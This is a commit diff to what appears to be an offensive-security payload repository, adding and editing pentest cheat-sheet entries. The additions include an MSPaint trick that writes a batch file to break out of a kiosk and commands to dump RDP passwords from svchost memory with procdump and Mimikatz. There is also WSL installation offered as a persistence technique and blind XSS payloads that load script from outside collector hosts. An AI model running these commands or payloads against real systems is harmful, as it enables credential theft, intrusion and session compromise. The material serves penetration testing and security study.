WSL + RDP Passwords + MSPaint Escape

p-g-krish · Feb 11, 2023 · 14cc883 · 14cc883
1 parent ccae5a6
commit 14cc883
Show file tree

Hide file tree

Showing 5 changed files with 72 additions and 15 deletions.
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -4186,3 +4186,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
 * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
 * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
+* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
+* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md
@@ -26,18 +26,20 @@
 * **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
 * **Task Manager**: `File` > `New Task (Run...)` > `cmd`
 * **MSPAINT.exe**
-    * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
+    * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels
     * Zoom in to make the following tasks easier
     * Using the colour picker, set pixels values to (from left to right):
-        * 1st: R: 10, G: 0, B: 0
-        * 2nd: R: 13, G: 10, B: 13
-        * 3rd: R: 100, G: 109, B: 99
-        * 4th: R: 120, G: 101, B: 46
-        * 5th: R: 0, G: 0, B: 101
-        * 6th: R: 0, G: 0, B: 0
+        ```ps1
+        1st: R: 10,  G: 0,   B: 0
+        2nd: R: 13,  G: 10,  B: 13
+        3rd: R: 100, G: 109, B: 99
+        4th: R: 120, G: 101, B: 46
+        5th: R: 0,   G: 0,   B: 101
+        6th: R: 0,   G: 0,   B: 0
+        ```
     * Save it as 24-bit Bitmap (*.bmp;*.dib)
     * Change its extension from bmp to bat and run 
-
+    
 
 ## Sticky Keys
 
@@ -146,4 +148,5 @@ firefox irc://127.0.0.1 -P "Test"
 * [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
 * [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
 * [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
-* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
+* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
+* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/)
diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
@@ -9,7 +9,8 @@
 * [Pass The Hash](#pass-the-hash)
 * [Golden ticket](#golden-ticket)
 * [Skeleton key](#skeleton-key)
-* [RDP session takeover](#rdp-session-takeover)
+* [RDP Session Takeover](#rdp-session-takeover)
+* [RDP Passwords](#rdp-passwords)
 * [Credential Manager & DPAPI](#credential-manager--dpapi)
   * [Chrome Cookies & Credential](#chrome-cookies--credential)
   * [Task Scheduled credentials](#task-scheduled-credentials)
@@ -168,7 +169,7 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 ```
 
-## RDP session takeover
+## RDP Session Takeover
 
 Use `ts::multirdp` to patch the RDP service to allow more than two users.
 
@@ -195,6 +196,34 @@ create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
 net start sesshijack
 ```
 
+## RDP Passwords
+
+Verify if the service is running: 
+
+```ps1
+sc queryex termservice
+tasklist /M:rdpcorets.dll
+netstat -nob | Select-String TermService -Context 1
+```
+
+* Extract passwords manually
+  ```ps1
+  procdump64.exe -ma 988 -accepteula C:\svchost.dmp
+  strings -el svchost* | grep Password123 -C3
+  ```
+* Extract passwords using Mimikatz
+  ```ps1
+  privilege::debug
+  ts::logonpasswords
+  ```
+
+
+
+
+
+
+
+
 
 ## Credential Manager & DPAPI
 
@@ -286,3 +315,4 @@ More information can be grabbed from the Memory with :
 - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
 - [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
+- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
@@ -33,6 +33,7 @@
     * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
     * [Skeleton Key](#skeleton-key)
     * [Virtual Machines](#virtual-machines)
+    * [Windows Subsystem for Linux](#windows-subsystem-for-linux)
 * [Domain](#domain)
     * [Golden Certificate](#golden-certificate)
     * [Golden Ticket](#golden-ticket)
@@ -539,6 +540,22 @@ sudo mkdir /mnt/c
 sudo mount -t vboxsf shadow_c /mnt/c
 ```
 
+### Windows Subsystem for Linux
+
+```ps1
+# List and install online packages
+wsl --list --online
+wsl --install -d kali-linux
+
+# Use a local package
+wsl --set-default-version 2
+curl.exe --insecure -L -o debian.appx https://aka.ms/wsl-debian-gnulinux
+Add-AppxPackage .\debian.appx
+
+# Run the machine as root
+wsl kali-linux --user root
+```
+
 
 ## Domain
 

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
@@ -510,13 +510,18 @@ document.getElementById('btn').onclick = function(e){
 
 ### XSS Hunter
 
-XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
-
 > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
 
+XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). 
+
+You can set up an alternative version 
+* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
+* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
+
 ```xml
-"><script src=//<your.subdomain>.xss.ht></script>
-<script>$.getScript("//<your.subdomain>.xss.ht")</script>
+"><script src="https://js.rip/<custom.name>"></script>
+"><script src=//<custom.subdomain>.xss.ht></script>
+<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
 ```
 
 ### Other Blind XSS tools